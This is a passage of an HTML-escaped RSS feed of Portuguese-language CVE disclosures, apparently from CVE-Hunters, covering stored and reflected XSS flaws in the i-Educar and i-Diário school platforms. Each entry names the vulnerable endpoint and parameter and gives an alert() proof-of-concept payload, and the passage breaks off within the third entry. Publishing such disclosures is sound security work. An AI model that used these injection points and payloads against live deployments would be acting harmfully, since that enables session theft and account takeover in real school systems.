&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8509-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_servidor_cadphp-parâmetro-matricula&amp;#34;&amp;gt;CVE-2025-8509: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(12)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Na página &amp;lt;code&amp;gt;/intranet/educar_servidor_det.php?cod_servidor=28915&amp;amp;ref_cod_instituicao=1&amp;lt;/code&amp;gt;, clique no botão &amp;lt;code&amp;gt;&amp;#34;Editar&amp;#34;&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8509/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;354&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8509/image-1_hu_f1e1a80ba93b939e.png 480w, /p/cve-2025-8509/image-1_hu_fe73307a5bce70dc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;573px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload foi enviado através do campo de matrícula e armazenado com sucesso. Ao acessar o conteúdo afetado, o JavaScript é executado imediatamente no contexto do navegador da vítima.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8511</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8511/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8511/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8511-cross-site-scripting-xss-armazenado-no-endpoint-diario-de-observacoesid-parâmetro-observações--descrição&amp;#34;&amp;gt;CVE-2025-8511: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Observações &amp;amp;gt; Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Observações &amp;gt; Descrição&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8511-cross-site-scripting-xss-armazenado-no-endpoint-diario-de-observacoesid-parâmetro-observações--descrição&amp;#34;&amp;gt;CVE-2025-8511: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Observações &amp;amp;gt; Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Observações &amp;gt; Descrição&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Observações &amp;amp;gt; Descrição&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Observações &amp;gt; Descrição&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8511/image.png&amp;#34;
	width=&amp;#34;911&amp;#34;
	height=&amp;#34;898&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8511/image_hu_f881a20290b02ea9.png 480w, /p/cve-2025-8511/image_hu_77597c0c3a04f49b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;101&amp;#34;
		data-flex-basis=&amp;#34;243px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8346</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8346/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8346/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8346-cross-site-scripting-xss-refletido-no-endpoint-educar_aluno_lstphp-via-parâmetro-ref_cod_matricula&amp;#34;&amp;gt;CVE-2025-8346: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; via parâmetro &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8346-cross-site-scripting-xss-refletido-no-endpoint-educar_aluno_lstphp-via-parâmetro-ref_cod_matricula&amp;#34;&amp;gt;CVE-2025-8346: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; via parâmetro &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
